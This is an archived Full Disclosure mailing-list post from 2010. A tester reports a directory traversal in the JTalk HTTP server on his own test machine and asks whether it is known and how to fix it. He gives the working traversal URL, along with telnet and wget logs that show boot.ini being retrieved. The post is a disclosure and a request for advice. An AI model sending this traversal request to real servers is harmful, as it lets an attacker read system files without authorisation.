Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

Directory Traversal on JTalk HTTP Server

From: rapper crazy <rappercrazzy () gmail com>
Date: Thu, 1 Jul 2010 02:26:29 +0530
Hello All,

Does anyone know of any Directory Traversal issue with Jtalk HTTP server?

I was testing one of my machine and found directory traversal on it.
http://192.168.10.120/.../.../.../.../.../.../.../.../.../boot.ini

Tried to enumerate the version but failed, attached below are the logs -
=============Header enumeration=============
[jt@secBox]$ telnet 192.168.10.120 80
Trying 192.168.10.120...
Connected to 192.168.10.120 (192.168.10.120).
Escape character is '^]'.
GET / HTTP/1.0

HTTP/1.0 404 Not Found
Server: JTALKServer
Allow: GET
Content-Type: text/html
Content-Length:87

<HTML>
<HEAD>
</HEAD>
<BODY>
<H1>HTTP Error 404</H1>
<H4>Not Found</H4>
</BODY>
</HTML>Connection closed by foreign host.
==============End Header Enumeration===============


Attached below are the logs for wget when I downloaded the boot.ini file

=========wget logs==============
[jt@secBox]$ wget
http://192.168.10.120/.../.../.../.../.../.../.../.../.../boot.ini
--2010-06-30 15:58:45--
http://192.168.10.120/.../.../.../.../.../.../.../.../.../boot.ini
Connecting to 192.168.10.120:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 208 [application/octet-stream]
Saving to: `boot.ini'

100%[====================================================================================================================>]
208         --.-K/s   in 0s

2010-06-30 15:58:45 (10.9 MB/s) - `boot.ini' saved [208/208]

[jt@secBox]$ cat boot.ini
[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Windows Server 2003, Standard"
/noexecute=optout /fastdetect
[jt@secBox]$

============end of logs=====================


So my question is does anyone know of any such issue? What could be the
remediation apart from disabling the service?

Thanks
Joshua

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Previous By Date Next
Previous By Thread Next

Current thread: